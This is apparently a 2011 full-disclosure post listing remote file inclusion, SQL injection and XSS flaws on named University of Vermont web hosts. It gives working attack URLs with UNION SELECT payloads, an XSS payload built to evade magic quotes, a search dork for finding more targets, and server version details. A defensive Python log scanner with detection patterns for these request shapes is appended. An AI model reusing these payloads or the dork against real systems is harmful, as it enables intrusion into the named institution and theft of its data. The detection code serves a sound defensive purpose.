University of Vermont suffers from cross site scripting, remote file inclusion, and remote SQL injection vulnerabilities. The university was contacted and has ignored the Author's emails.
##############################################################################################
| Title : University Of Vermont Multiple Vulnerabilities(uvm.edu)
| Author : Codeine
| Email : f3codeine[at]yahoo[dot]com
| Twitter: codeinesec
| Date : 08/10/2011
| Cat : PHP[RFI,SQLI,XSS]
| URL : https://uvm.edu/
##############################################################################################
Uname: Linux tarantula.uvm.edu 2.6.23.17-3.uvm #1 SMP Tue Dec 15 12:08:51 EST 2009 i686
Software: Apache/2.2.3 (Red Hat). PHP/5.3.3
##############################################################################################
The University Of Vermont suffers from multiple web application vulnerabilities such as
Remote File Inclusion, SQL Injection, and Cross Site Scripting (XSS).
##############################################################################################
[*]Remote File Inclusion-
magicscript.php?Page=Calendar&intro=https://google.com/
This script shows up in almost every directory of every subdomain of uvm.edu.
https://vermontdesigninstitute.org/extension/magicscript.php?Page=Calendar&intro=https://google.com/
https://www.uvm.edu/magicscript.php?Page=Calendar&intro=https://google.com/
Dork: site:uvm.edu inurl:magicscript
_________________________________________________________________________________________________
[*]SqlInjection-
https://vmc.snr.uvm.edu/vmc/research/metadata.php?id=-25%20union%20select%20@@version,2,3--
[*]Xss-
https://vmc.snr.uvm.edu/vmc/research/searchresults.php (Post)
Magic quotes are active, but easily bypassable with "String.fromCharCode"
<script>alert(String.fromCharCode(67, 111, 100, 101, 105, 110, 101, 88, 115, 115))</script>
The above is what I sent to post, which contains "CodeineXss"
_________________________________________________________________________________________________
[*]SqlInjection-
https://www.uvm.edu/rsenr/nsrc/projectpages/project.php?id=-69%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89--
_________________________________________________________________________________________________
[*]SqlInjection-
https://bol.uvm.edu/tool_feature.php?id=-1%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
_________________________________________________________________________________________________
Greetz Hidden Ninja
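
A defender-side check for the request shapes listed in this advisory, as an added example that is not part of the original advisory: it scans access-log lines for an `intro` value that is a remote URL, an `id` value that is not a plain integer, and script markup in query values. The log lines, hosts and IPs are constructed, and treating `intro` and `id` as the sensitive parameters is an assumption taken from the URLs above.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: parameter names are taken from the advisory's URLs.
INCLUDE_PARAMS = {"intro"}  # value reaches a PHP include
NUMERIC_PARAMS = {"id"}     # value reaches a SQL query
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp|php|data):", re.I)
SCRIPTISH = re.compile(r"<\s*script|String\.fromCharCode", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the set of findings for one request target (path?query)."""
    findings = set()
    # parse_qsl percent-decodes values, so encoded payloads are checked in clear text.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        key = name.lower()
        if key in INCLUDE_PARAMS and REMOTE_URL.match(value):
            findings.add("remote-include")
        if key in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            findings.add("non-numeric-id")
        # Query string only: POST bodies are not in access logs.
        if SCRIPTISH.search(value):
            findings.add("script-markup")
    return findings

def scan(lines):
    """Yield (client_ip, target, findings) for each log line with findings."""
    for line in lines:
        m = REQUEST.search(line)
        found = classify(m.group(1)) if m else set()
        if found:
            yield line.split()[0], m.group(1), found

# Constructed sample lines (combined log format, documentation hosts and IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Aug/2011:10:00:01 -0400] "GET /magicscript.php?Page=Calendar&intro=https://example.test/ HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Aug/2011:10:00:05 -0400] "GET /metadata.php?id=-25%20union%20select%20@@version,2,3-- HTTP/1.1" 200 733',
    '198.51.100.7 - - [10/Aug/2011:10:01:00 -0400] "GET /metadata.php?id=25 HTTP/1.1" 200 901',
    '198.51.100.7 - - [10/Aug/2011:10:01:09 -0400] "GET /magicscript.php?Page=Calendar&intro=calendar_intro.html HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for ip, target, found in scan(SAMPLE_LOG):
        print(ip, sorted(found), target)
```

The `id` check is a strict type test rather than a keyword signature, so it also flags encodings and variants that a `union select` pattern match would miss.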